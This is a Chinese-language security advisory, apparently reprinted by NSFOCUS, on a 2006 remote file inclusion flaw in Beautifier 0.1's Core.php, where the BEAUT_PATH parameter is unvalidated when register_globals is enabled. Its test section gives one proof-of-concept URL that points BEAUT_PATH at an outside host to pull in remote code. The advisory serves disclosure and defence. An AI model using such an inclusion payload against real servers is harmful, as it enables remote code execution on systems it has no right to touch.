安全研究

安全漏洞
Beautifier Core.PHP远程文件包含漏洞

发布日期:2006-09-06
更新日期:2006-09-06

受影响系统:
beautifier beautifier 0.1
描述:
BUGTRAQ  ID: 19873

Beautifier 0.1版本没有正确验证Beautifier/Core.php及HFile/HFile_xhtml11.php的"BEAUT_PATH"参数,成功利用后可导致包含外部及本地资源的任意文件。要利用此漏洞需要启用"register_globals"。

<*来源:the master
  
  链接:http://secunia.com/advisories/21806/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/[Path]/Beautifier/Core.php?BEAUT_PATH=http://cmd.gif?

建议:
厂商补丁:

beautifier
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.beautifier.org/

浏览次数:2426
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障